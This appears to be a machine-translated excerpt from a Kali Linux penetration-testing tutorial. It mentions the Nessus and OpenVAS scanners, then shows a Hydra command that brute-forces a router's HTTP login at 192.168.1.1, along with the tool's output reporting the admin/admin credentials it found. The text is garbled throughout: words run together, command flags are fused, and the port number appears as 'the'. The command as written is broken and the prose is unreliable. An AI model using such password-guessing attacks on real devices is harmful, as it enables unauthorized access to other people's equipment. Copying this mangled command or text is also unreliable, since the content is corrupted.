The idea of penetrating attacks is generally to scan for vulnerabilities and then exploit different vulnerabilities to attack penetration.
Vulnerability Scanning Tool has nessus, the tool can be at the same time on the local or remote control, the vulnerability analysis of the system scan. Nessus a system vulnerability can be scanned by creating a new scan policy and adding a corresponding plug-in.
Another vulnerability scanning Tool is OpenVAS, which is not described here.
The above describes the vulnerability scanning, below the infiltration attack commonly used tools Hydra and Medusa.
Give an example of a router login password.
[Email protected]:~# hydra-l admin-p/tmp/tt.txt-f-v-e nsr-s the-T1 192.168.1.1http-Gethydra v7.5(c) -By van Hauser/thc & David Maciejak- forlegal Purposes Onlyhydra (http://Www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37[WARNING] You must supply the Web page as a additional option or VIA-M, default path set to/[DATA]1Task1Server7 LoginTries (L:1/P:7), ~7tries per Task[data] attacking service HTTP-get on port the[attempt] target192.168.1.1-Login "Admin"-Pass"Admin"-1Of7[Child0][ the][WWW] Host:192.168.1.1 Login: admin Password:admin[status] attack finished for 192.168.1.1(valid pair found)1Of1Target successfully completed,1valid Password Foundhydra (http://Www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38
Kali Linux penetration Test common Tools Rollup 2-penetration attack